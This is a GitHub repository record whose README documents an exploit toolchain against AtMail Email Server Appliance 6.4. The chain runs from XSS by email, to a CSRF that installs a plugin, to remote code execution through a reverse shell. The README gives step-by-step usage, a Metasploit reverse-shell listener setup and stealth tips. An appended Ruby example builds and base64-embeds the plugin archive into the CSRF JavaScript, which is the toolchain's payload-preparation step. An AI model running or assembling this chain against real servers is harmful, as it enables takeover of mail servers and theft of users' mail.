{"id":18688791,"url":"https://github.com/noraj/atmail-exploit-toolchain","last_synced_at":"2025-04-12T05:38:13.849Z","repository":{"id":86821675,"uuid":"261028953","full_name":"noraj/Atmail-exploit-toolchain","owner":"noraj","description":"AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS \u003e CSRF \u003e RCE)","archived":false,"fork":false,"pushed_at":"2022-12-08T19:51:49.000Z","size":12,"stargazers_count":11,"open_issues_count":0,"forks_count":1,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-04-12T05:38:06.514Z","etag":null,"topics":["atmail","csrf","exploit","plugin","rce","reverse-shell","xss"],"latest_commit_sha":null,"homepage":"https://pwn.by/noraj/","language":"PHP","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/noraj.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-05-03T21:59:51.000Z","updated_at":"2024-10-02T05:20:08.000Z","dependencies_parsed_at":null,"dependency_job_id":"aa46764c-13af-4568-96a8-0881ede84f90","html_url":"https://github.com/noraj/Atmail-exploit-toolchain","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FAtmail-exploit-toolchain","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FAtmail-exploit-toolchain/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FAtmail-exploit-toolchain/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FAtm
ail-exploit-toolchain/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/noraj","download_url":"https://codeload.github.com/noraj/Atmail-exploit-toolchain/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248525168,"owners_count":21118616,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["atmail","csrf","exploit","plugin","rce","reverse-shell","xss"],"created_at":"2024-11-07T10:38:24.207Z","updated_at":"2025-04-12T05:38:13.841Z","avatar_url":"https://github.com/noraj.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"# AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS \u003e CSRF \u003e RCE)\n\n[[PacketStorm](https://packetstormsecurity.com/files/158710/AtMail-Email-Server-Appliance-6.4-XSS-CSRF-Code-Execution.html)] [[WLB-2020080010](https://cxsecurity.com/issue/WLB-2020080010)]\n\nDisclaimer: this exploit toolchain was inspired by [EDB-ID 20009][20009].\n\n## Goal\n\nThe goal of this exploit toolchain is to replace [EDB-ID 20009][20009].\n\nPros of this toolchain over the [EDB-ID 20009][20009] exploit:\n\n+ Simple to use\n+ Reusable\n+ Dynamically generated payloads\n+ Easily editable / hackable\n+ Clear code and plugin available\n\nCons of the [EDB-ID 20009][20009] exploit:\n\n- Not customizable (static hardcoded payloads)\n- Complex to use (many hardcoded values need to be replaced and the code adapted to suit the target environment)\n- One-shot use (all values hardcoded)\n- The plugin archive tgz is embedded as a string (hex chars), so the plugin source 
code can't be easily read or modified\n\n## Requirements\n\n- (Optional) [Metasploit Framework][msf] (`msfvenom` for reverse shell generation)\n- [tar][tar] (to generate the plugin archive)\n- [ruby][ruby] (payload preparation and XSS SMTP delivery)\n- (Optional) A web server to deliver the JavaScript CSRF payload loaded by the XSS\n- Knowing an Atmail admin email address (only admins can install a plugin)\n- Passive interaction (the admin needs to open the email containing the XSS payload in the WebMail while having a valid administration interface session running)\n\nInstall the requirements on ArchLinux:\n\n```\n$ sudo pacman -S metasploit tar ruby\n```\n\n## How it works\n\n1. An email containing an XSS payload is sent to the admin\n2. The XSS payload remotely loads the JavaScript CSRF\n3. The CSRF installs a plugin\n4. Once installed, the plugin executes a system command: the reverse shell\n\nExploit files:\n\n- `config.yml` contains the toolchain configuration\n- `exploit.sh` the exploit wrapper that needs to be executed\n- `xss_mail.rb` sends the email containing the XSS to the admin via the Atmail SMTP server (unauthenticated)\n- `csrf_prepare.rb` prepares the CSRF payload (setting the target and encoding the plugin archive)\n- `rce_prepare.rb` prepares the RCE (generating the reverse shell and creating the plugin archive)\n- `csrf_plugin.js` the prepared CSRF payload\n- `noraj/` folder containing the uncompressed plugin tree\n\n## Usage\n\nThe exploit toolchain requires only 2 manual steps:\n\n1. Edit `config.yml`\n2. Launch `exploit.sh`\n\nBut before launching the attack, a web server needs to be serving the JavaScript CSRF file and a reverse shell listener needs to be waiting for the connection. So the attack looks more like:\n\n1. Edit `config.yml`\n2. Start an HTTP server that will deliver `csrf_plugin.js`\n3. Start the reverse shell listener\n4. Launch `exploit.sh`\n\nExample of a one-line HTTP server:\n\n```\n$ ruby -run -e httpd . 
-p 8000\n```\n\nExample of a reverse shell listener:\n\n```\nmsf5 \u003e use exploit/multi/handler\nmsf5 exploit(multi/handler) \u003e set payload php/reverse_php\npayload =\u003e php/reverse_php\nmsf5 exploit(multi/handler) \u003e set LHOST 1.1.1.1\nLHOST =\u003e 1.1.1.1\nmsf5 exploit(multi/handler) \u003e set LPORT 8080\nLPORT =\u003e 8080\nmsf5 exploit(multi/handler) \u003e run\n```\n\n## Notes\n\n- The RCE occurs only when the plugin is **installed**; if the reverse shell connection is lost, re-executing means re-installing the plugin, so the admin only needs to reload his mailbox (re-triggering the XSS and the CSRF).\n- Red teamers could enhance the exploit to auto-remove the email once read and to remove the plugin once the reverse shell connection is established: less persistent but stealthier.\n- msfvenom (MSF 5.0) only supports an IP address for LHOST, not a domain.\n- As said in _Requirements_, the admin needs to be logged in to both the WebMail and the administration interface.\n- Tested with Ruby 2.7.\n\n[20009]:https://www.exploit-db.com/exploits/20009\n[msf]:https://github.com/rapid7/metasploit-framework\n[tar]:https://www.gnu.org/software/tar/\n[ruby]:https://www.ruby-lang.org/\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnoraj%2Fatmail-exploit-toolchain","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnoraj%2Fatmail-exploit-toolchain","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnoraj%2Fatmail-exploit-toolchain/lists"}
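The README describes `rce_prepare.rb` and `csrf_prepare.rb` as "creating the plugin archive" and "encoding the plugin archive" into the JavaScript CSRF file, and contrasts this dynamic generation with EDB-ID 20009's hardcoded hex blob. The following is an added example, not code from the toolchain or from EDB-ID 20009: it performs that archive-and-embed step in plain Ruby (the toolchain's scripting language) without shelling out to `tar`, and then decodes what it embedded to confirm the round trip. The `config.yml` keys, the plugin file names, the `__TARGET__` / `__ARCHIVE_B64__` placeholders and the JS template are all constructed here for illustration; the actual request the CSRF sends to the Atmail administration interface is deliberately not reproduced.

```ruby
# Added example: build a tar.gz plugin archive in memory, base64-encode it into
# a JS template, then decode and verify it. Config keys, placeholder names and
# the plugin tree below are constructed assumptions, not the toolchain's own.
require 'rubygems/package'
require 'zlib'
require 'stringio'
require 'base64'
require 'yaml'
require 'tmpdir'
require 'fileutils'

# Constructed stand-in for config.yml (the real key names are not shown on the page).
EXAMPLE_CONFIG = <<~YAML
  target: https://mail.example.test
  plugin_dir: noraj
  lhost: 192.0.2.10
  lport: 8080
YAML

# Build a gzip-compressed tar archive of +dir+ entirely in memory; returns the bytes.
def build_tgz(dir)
  out = StringIO.new(''.b)
  gz = Zlib::GzipWriter.new(out)
  Gem::Package::TarWriter.new(gz) do |tar|
    Dir.glob('**/*', base: dir).sort.each do |rel|
      path = File.join(dir, rel)
      if File.directory?(path)
        tar.mkdir(rel, 0o755)
      else
        data = File.binread(path)
        tar.add_file_simple(rel, 0o644, data.bytesize) { |f| f.write(data) }
      end
    end
  end
  gz.finish # write the gzip trailer but leave +out+ open so we can read it
  out.string
end

# Inverse of build_tgz: { relative_path => contents } for regular files only,
# so the embedded archive can be checked before it is served to anyone.
def read_tgz(bytes)
  files = {}
  Zlib::GzipReader.wrap(StringIO.new(bytes)) do |gz|
    Gem::Package::TarReader.new(gz) do |tar|
      tar.each { |entry| files[entry.full_name] = entry.read if entry.file? }
    end
  end
  files
end

# Substitute target and archive into a JS template. Placeholder names are assumed.
def render_js(template, target:, archive_b64:)
  template.gsub('__TARGET__', target).gsub('__ARCHIVE_B64__', archive_b64)
end

# End to end: write a constructed plugin tree, archive and encode it, render the
# template, then pull the archive back out of the JS and decode it.
def prepare_example
  config = YAML.safe_load(EXAMPLE_CONFIG)
  Dir.mktmpdir do |tmp|
    plugin = File.join(tmp, config['plugin_dir'])
    FileUtils.mkdir_p(File.join(plugin, 'lib'))
    File.write(File.join(plugin, 'plugin.xml'), "<plugin name=\"example\"/>\n")
    File.write(File.join(plugin, 'lib', 'hook.php'), "<?php // constructed placeholder\n")

    tgz = build_tgz(plugin)
    b64 = Base64.strict_encode64(tgz) # strict: no newlines that would break a JS string literal
    js  = render_js("var target = '__TARGET__';\nvar archive = '__ARCHIVE_B64__';\n",
                    target: config['target'], archive_b64: b64)

    embedded = js[/var archive = '([^']+)'/, 1]
    { js: js, files: read_tgz(Base64.strict_decode64(embedded)), size: tgz.bytesize }
  end
end

if $PROGRAM_NAME == __FILE__
  r = prepare_example
  puts "archive: #{r[:size]} bytes, entries: #{r[:files].keys.join(', ')}"
end
```

Two details matter in practice: `Base64.strict_encode64` is used rather than `encode64` because the latter inserts line breaks every 60 characters, which would terminate a single-quoted JS string; and the archive is decoded again from the rendered JS rather than trusted, because a truncated or mis-escaped blob would only surface later as a silent install failure on the target, with no error visible to the operator.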